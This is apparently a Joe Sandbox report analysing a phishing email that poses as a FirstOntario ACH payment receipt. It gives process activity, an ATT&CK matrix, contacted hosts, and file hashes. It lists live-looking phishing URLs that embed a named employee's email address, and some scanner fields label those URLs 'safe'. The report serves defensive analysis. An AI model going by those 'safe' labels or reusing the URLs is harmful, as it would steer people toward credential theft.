            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation11
            Browser Extensions
            1
            Process Injection
            11
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Modify Registry
            LSASS Memory1
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Process Injection
            Security Account Manager13
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT0%Avira URL Cloudsafe
            file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.html0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92587e487fd0a0f4&lang=auto0%Avira URL Cloudsafe
            https://newtargetonline.quokka.it.com/RsNRx?e=alison.bagnulo@firstontario.com0%Avira URL Cloudsafe
            https://newtargetonline.quokka.it.com/RsNRx/?e=alison.bagnulo@firstontario.com0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92587e487fd0a0f4/1742843686586/f64cEShR0G0gLXR0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92587e487fd0a0f4/1742843686582/6a30bca1fa83cfbb7a517f97e2e014bf4040a5b9a58907bfe69be8647ccdf46a/Jwgj0Sg85DIMEmJ0%Avira URL Cloudsafe
            https://ulgf.quokka.it.com/google.php0%Avira URL Cloudsafe
            https://5660942597-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            jsdelivr.map.fastly.net
            151.101.129.229
            truefalse
              high
              stackpath.bootstrapcdn.com
              104.18.10.207
              truefalse
                high
                mailmeteor.com
                104.21.92.58
                truefalse
                  high
                  s-part-0012.t-0009.t-msedge.net
                  13.107.246.40
                  truefalse
                    high
                    e329293.dscd.akamaiedge.net
                    23.209.72.31
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.11.207
                      truefalse
                        high
                        cos.ap-tokyo.myqcloud.com
                        43.128.240.48
                        truefalse
                          high
                          newtargetonline.quokka.it.com
                          104.21.88.169
                          truefalse
                            high
                            code.jquery.com
                            151.101.130.137
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                high
                                challenges.cloudflare.com
                                104.18.94.41
                                truefalse
                                  high
                                  www.google.com
                                  142.251.40.196
                                  truefalse
                                    high
                                    s-0005.dual-s-msedge.net
                                    52.123.128.14
                                    truefalse
                                      high
                                      ulgf.quokka.it.com
                                      104.21.88.169
                                      truefalse
                                        high
                                        5660942597-1317754460.cos.ap-tokyo.myqcloud.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          cdn.jsdelivr.net
                                          unknown
                                          unknownfalse
                                            high
                                            aadcdn.msftauth.net
                                            unknown
                                            unknownfalse
                                              high
                                              aadcdn.msauthimages.net
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92587e487fd0a0f4/1742843686586/f64cEShR0G0gLXRfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                    high
                                                    https://newtargetonline.quokka.it.com/RsNRx?e=alison.bagnulo@firstontario.comfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://5660942597-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.jsfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                        high
                                                        https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92587e487fd0a0f4/1742843686582/6a30bca1fa83cfbb7a517f97e2e014bf4040a5b9a58907bfe69be8647ccdf46a/Jwgj0Sg85DIMEmJfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                            high
                                                            file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.htmltrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92587e487fd0a0f4&lang=autofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                high
                                                                https://ulgf.quokka.it.com/google.phpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                                  high
                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oTfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://newtargetonline.quokka.it.com/RsNRx/?e=alison.bagnulo@firstontario.comfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    43.128.240.48
                                                                    cos.ap-tokyo.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                    52.109.4.7
                                                                    unknownUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    104.18.10.207
                                                                    stackpath.bootstrapcdn.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    13.107.246.40
                                                                    s-part-0012.t-0009.t-msedge.netUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    104.21.88.169
                                                                    newtargetonline.quokka.it.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    151.101.129.229
                                                                    jsdelivr.map.fastly.netUnited States
                                                                    54113FASTLYUSfalse
                                                                    23.216.132.21
                                                                    unknownUnited States
                                                                    7016CCCH-3USfalse
                                                                    104.18.94.41
                                                                    challenges.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    142.251.32.99
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    52.182.143.215
                                                                    unknownUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    23.216.132.28
                                                                    unknownUnited States
                                                                    7016CCCH-3USfalse
                                                                    151.101.130.137
                                                                    code.jquery.comUnited States
                                                                    54113FASTLYUSfalse
                                                                    142.251.41.14
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.40.196
                                                                    www.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.40.174
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.67.151.109
                                                                    unknownUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    23.209.72.31
                                                                    e329293.dscd.akamaiedge.netUnited States
                                                                    20940AKAMAI-ASN1EUfalse
                                                                    104.21.92.58
                                                                    mailmeteor.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    142.250.80.106
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.17.24.14
                                                                    cdnjs.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    1.1.1.1
                                                                    unknownAustralia
                                                                    13335CLOUDFLARENETUSfalse
                                                                    23.200.0.10
                                                                    unknownUnited States
                                                                    20940AKAMAI-ASN1EUfalse
                                                                    142.251.179.84
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.217.165.138
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.40.238
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    52.123.128.14
                                                                    s-0005.dual-s-msedge.netUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    104.18.11.207
                                                                    maxcdn.bootstrapcdn.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    142.251.40.163
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.176.195
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    IP
                                                                    192.168.2.16
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1647413
                                                                    Start date and time:2025-03-24 20:13:51 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:17
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    Analysis Mode:stream
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:702cb6e..eml
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:Approved ACH _ ePayments reciept for Firstontario epayment powered by Fastpay Ref_4104ee99b1c6f51c657203ba9a2ba2a3f702cb6e..eml
                                                                    Detection:MAL
                                                                    Classification:mal72.phis.winEML@26/19@40/244
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .eml
                                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.200.0.10, 23.200.0.15, 52.109.4.7, 52.123.128.14, 40.126.24.82
                                                                    • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, eus2-azsc-000.odc.officeapps.live.com, dual-s-0005-office.config.skype.com, us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, login.live.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, prod.odcsm1.live.com.akadns.net, a1864.dscd.akamai.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtSetValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/3Z35P0VG/Firstontario00990938376360__098.html
                                                                    • VT rate limit hit for: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/837857943:1742840853:Tz3YFU085wYaInkrE9KujTlEpb5s9JaahUyc1oiNeEQ/92587e487fd0a0f4/Uq_eX371_Tp1QfK.pYf9epUjwAJIrwT7DZyGMyKqkOE-1742843685-1.1.1.1-chVtUcNlysHYSnb9Ad60cIgsSQHyP9rubGfq2HGdGplOXYR28buvBtzjbutCj5oT
                                                                    • VT rate limit hit for: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92587e487fd0a0f4&amp;lang=auto
                                                                    • VT rate limit hit for: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1fzst/0x4AAAAAABAEUlzWaSj0Ip4v/auto/fbE/new/normal/auto/
                                                                    • VT rate limit hit for: https://newtargetonline.quokka.it.com/RsNRx/?e=alison.bagnulo@firstontario.com
                                                                    • VT rate limit hit for: https://newtargetonline.quokka.it.com/RsNRx?e=alison.bagnulo@firstontario.com
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):4.501856783964835
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4A785D4E96D55B8D3959C498D610E4FA
                                                                    SHA1:CD42354C73B12F87C8F48B87140E719F0B9ADC06
                                                                    SHA-256:1D66CE3EE66A04C079A47995ED879CD017D1888B87EB730680A1A7CEC919793D
                                                                    SHA-512:9231121B529FE961481B1AB73C127FD1FBF0795664FF596F3963FA8AFC7F1F27AEBDAB01AFF28EC0615A0B8285630D4AC316402FA9A8206376B0276C1506755A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:............................................................................`... .............................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................<.1.........................v.2._.O.U.T.L.O.O.K.:.1.8.8.c.:.a.e.0.8.d.5.8.7.e.6.8.4.4.7.5.f.b.9.f.a.7.7.9.f.1.f.b.f.e.7.2.b...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.2.4.T.1.5.1.4.1.6.0.4.5.3.-.6.2.8.4...e.t.l.......P.P. .....................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                                    Category:dropped
                                                                    Size (bytes):271360
                                                                    Entropy (8bit):2.6035325067741404
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4EEDC47729E51C4453CEC7593BD99E37
                                                                    SHA1:B27C228CA1ED74EE124A7A6B6F0A07B92F45CC95
                                                                    SHA-256:D320D4FE3F3C21B28D70ABD52B65B7E973978C321F47A664E6B551B10CD9733A
                                                                    SHA-512:E665CD061483A5AF3C8D7D765A14CC6A9746C47ACBA7FFCD806F72F9383F9B701ACD1BA7077EEBBDABD461C03EF164CB24ED70D9439CBEBB9ECB94D95EC4C508
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview:!BDN."..SM......\...............@.......b................@...........@...@...................................@...........................................................................$.......D......................?...............<...........................................................................................................................................................................................................................................................................................,.........C..bH.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):131072
                                                                    Entropy (8bit):2.933037897953882
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:90AB865F5C232216878583CCF6376976
                                                                    SHA1:CCB46E176382F2DEAF32035DF842E65454D5150A
                                                                    SHA-256:91F1C63FCD97CD754B11D8646A751D325CB000F87F226E631924C27634694C77
                                                                    SHA-512:0BC9098A797BA0B4FBAA2C14DBDF2D22E885CADA2FDE50A1A40507C5B024BCA0803F99E9D2EF2B3D688D6D27049EDBBCEA70054175282EFFCBF4486261FB6736
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview:.3.C...c............*s......................#.!BDN."..SM......\...............@.......b................@...........@...@...................................@...........................................................................$.......D......................?...............<...........................................................................................................................................................................................................................................................................................,.........C..bH..*s.........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (32012)
                                                                    Category:downloaded
                                                                    Size (bytes):69597
                                                                    Entropy (8bit):5.369216080582935
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):1864
                                                                    Entropy (8bit):5.222032823730197
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
